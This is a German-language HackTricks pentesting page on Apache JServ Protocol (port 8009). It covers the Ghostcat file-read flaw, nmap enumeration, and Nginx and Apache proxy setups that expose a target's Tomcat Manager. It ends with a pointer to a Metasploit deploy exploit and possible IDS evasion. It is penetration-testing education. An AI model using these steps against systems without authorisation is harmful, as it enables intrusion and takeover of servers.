hacktricks/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md

8009 - Pentesting Apache JServ Protocol (AJP)

{% hint style="success" %} Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Überprüfen Sie die Abonnementpläne!
• Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
• Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.

{% endhint %}

Treten Sie dem HackenProof Discord Server bei, um mit erfahrenen Hackern und Bug-Bounty-Jägern zu kommunizieren!

Hacking Einblicke
Engagieren Sie sich mit Inhalten, die in den Nervenkitzel und die Herausforderungen des Hackens eintauchen

Echtzeit-Hack-Nachrichten
Bleiben Sie auf dem Laufenden über die schnelllebige Hacking-Welt durch Echtzeitnachrichten und Einblicke

Neueste Ankündigungen
Bleiben Sie informiert über die neuesten Bug-Bounties und wichtige Plattform-Updates

Treten Sie uns auf Discord bei und beginnen Sie noch heute mit den besten Hackern zusammenzuarbeiten!

Grundinformationen

Von: https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/

AJP ist ein Drahtprotokoll. Es ist eine optimierte Version des HTTP-Protokolls, um einem eigenständigen Webserver wie Apache die Kommunikation mit Tomcat zu ermöglichen. Historisch gesehen war Apache beim Bereitstellen von statischen Inhalten viel schneller als Tomcat. Die Idee ist, Apache die statischen Inhalte, wenn möglich, bereitstellen zu lassen, aber die Anfrage an Tomcat für Tomcat-bezogene Inhalte weiterzuleiten.

Auch interessant:

Das ajp13-Protokoll ist paketorientiert. Ein binäres Format wurde vermutlich aus Leistungsgründen gegenüber dem lesbareren Klartext gewählt. Der Webserver kommuniziert über TCP-Verbindungen mit dem Servlet-Container. Um den kostspieligen Prozess der Socket-Erstellung zu reduzieren, wird der Webserver versuchen, persistente TCP-Verbindungen zum Servlet-Container aufrechtzuerhalten und eine Verbindung für mehrere Anfrage-/Antwortzyklen wiederzuverwenden.

Standardport: 8009

PORT     STATE SERVICE
8009/tcp open  ajp13

CVE-2020-1938 'Ghostcat'

Wenn der AJP-Port exponiert ist, könnte Tomcat anfällig für die Ghostcat-Sicherheitsanfälligkeit sein. Hier ist ein Exploit, der mit diesem Problem funktioniert.

Ghostcat ist eine LFI-Sicherheitsanfälligkeit, aber etwas eingeschränkt: Nur Dateien aus einem bestimmten Pfad können abgerufen werden. Dennoch kann dies Dateien wie WEB-INF/web.xml umfassen, die wichtige Informationen wie Anmeldeinformationen für die Tomcat-Oberfläche preisgeben können, abhängig von der Serverkonfiguration.

Patches für Versionen ab 9.0.31, 8.5.51 und 7.0.100 haben dieses Problem behoben.

Enumeration

Automatic

nmap -sV --script ajp-auth,ajp-headers,ajp-methods,ajp-request -n -p 8009 <IP>

Brute force

AJP-Proxy

Nginx Reverse Proxy & AJP

Überprüfen Sie die Dockerisierte Version

Wenn wir auf einen offenen AJP-Proxy-Port (8009 TCP) stoßen, können wir Nginx mit dem ajp_module verwenden, um auf den "versteckten" Tomcat Manager zuzugreifen. Dies kann erreicht werden, indem der Nginx-Quellcode kompiliert und das erforderliche Modul hinzugefügt wird, wie folgt:

• Laden Sie den Nginx-Quellcode herunter
• Laden Sie das erforderliche Modul herunter
• Kompilieren Sie den Nginx-Quellcode mit dem ajp_module.
• Erstellen Sie eine Konfigurationsdatei, die auf den AJP-Port verweist

# Download Nginx code
wget https://nginx.org/download/nginx-1.21.3.tar.gz
tar -xzvf nginx-1.21.3.tar.gz

# Compile Nginx source code with the ajp module
git clone https://github.com/dvershinin/nginx_ajp_module.git
cd nginx-1.21.3
sudo apt install libpcre3-dev
./configure --add-module=`pwd`/../nginx_ajp_module --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx --modules-path=/usr/lib/nginx/modules
make
sudo make install
nginx -V

Kommentieren Sie den gesamten server-Block aus und fügen Sie die folgenden Zeilen innerhalb des http-Blocks in /etc/nginx/conf/nginx.conf hinzu.

upstream tomcats {
server <TARGET_SERVER>:8009;
keepalive 10;
}
server {
listen 80;
location / {
ajp_keep_conn on;
ajp_pass tomcats;
}
}

Starten Sie Nginx und überprüfen Sie, ob alles korrekt funktioniert, indem Sie eine cURL-Anfrage an Ihren lokalen Host senden.

sudo nginx
curl http://127.0.0.1:80

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<title>Apache Tomcat/X.X.XX</title>
<link href="favicon.ico" rel="icon" type="image/x-icon" />
<link href="favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="tomcat.css" rel="stylesheet" type="text/css" />
</headas
<body>
<div id="wrapper">
<div id="navigation" class="curved container">
<span id="nav-home"><a href="https://tomcat.apache.org/">Home</a></span>
<span id="nav-hosts"><a href="/docs/">Documentation</a></span>
<span id="nav-config"><a href="/docs/config/">Configuration</a></span>
<span id="nav-examples"><a href="/examples/">Examples</a></span>
<span id="nav-wiki"><a href="https://wiki.apache.org/tomcat/FrontPage">Wiki</a></span>
<span id="nav-lists"><a href="https://tomcat.apache.org/lists.html">Mailing Lists</a></span>
<span id="nav-help"><a href="https://tomcat.apache.org/findhelp.html">Find Help</a></span>
<br class="separator" />
</div>
<div id="asf-box">
<h1>Apache Tomcat/X.X.XX</h1>
</div>
<div id="upper" class="curved container">
<div id="congrats" class="curved container">
<h2>If you're seeing this, you've successfully installed Tomcat. Congratulations!</h2>
<SNIP>

Nginx Dockerisierte-Version

git clone https://github.com/ScribblerCoder/nginx-ajp-docker
cd nginx-ajp-docker

Ersetzen Sie TARGET-IP in nginx.conf durch die AJP-IP und bauen Sie es dann und führen Sie es aus.

docker build . -t nginx-ajp-proxy
docker run -it --rm -p 80:80 nginx-ajp-proxy

Apache AJP Proxy

Es ist selten, einen offenen Port 8009 ohne andere zugängliche Webports zu finden. Es ist jedoch immer noch möglich, ihn mit Metasploit auszunutzen. Durch die Nutzung von Apache als Proxy können Anfragen an Tomcat auf Port 8009 umgeleitet werden.

sudo apt-get install libapache2-mod-jk
sudo vim /etc/apache2/apache2.conf # append the following line to the config
Include ajp.conf
sudo vim /etc/apache2/ajp.conf     # create the following file, change HOST to the target address
ProxyRequests Off
<Proxy *>
Order deny,allow
Deny from all
Allow from localhost
</Proxy>
ProxyPass       / ajp://HOST:8009/
ProxyPassReverse    / ajp://HOST:8009/
sudo a2enmod proxy_http
sudo a2enmod proxy_ajp
sudo systemctl restart apache2

Dieses Setup bietet das Potenzial, Intrusion Detection und Prevention Systeme (IDS/IPS) aufgrund der binären Natur des AJP-Protokolls zu umgehen, obwohl diese Fähigkeit nicht verifiziert wurde. Indem Sie einen regulären Metasploit Tomcat Exploit an 127.0.0.1:80 richten, können Sie effektiv die Kontrolle über das angevisierte System übernehmen.

msf  exploit(tomcat_mgr_deploy) > show options

Referenzen

• https://github.com/yaoweibin/nginx_ajp_module
• https://academy.hackthebox.com/module/145/section/1295

Tritt dem HackenProof Discord Server bei, um mit erfahrenen Hackern und Bug-Bounty-Jägern zu kommunizieren!

Hacking Einblicke
Engagiere dich mit Inhalten, die in den Nervenkitzel und die Herausforderungen des Hackens eintauchen

Echtzeit Hack Nachrichten
Bleibe auf dem Laufenden über die schnelllebige Hackerwelt durch Echtzeitnachrichten und Einblicke

Neueste Ankündigungen
Bleibe informiert über die neuesten Bug-Bounties und wichtige Plattform-Updates

Tritt uns bei Discord und beginne noch heute mit den besten Hackern zusammenzuarbeiten!

{% hint style="success" %} Lerne & übe AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lerne & übe GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Unterstütze HackTricks

• Überprüfe die Abonnementpläne!
• Tritt der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folge uns auf Twitter 🐦 @hacktricks_live.
• Teile Hacking-Tricks, indem du PRs an die HackTricks und HackTricks Cloud GitHub-Repos einreichst.

{% endhint %}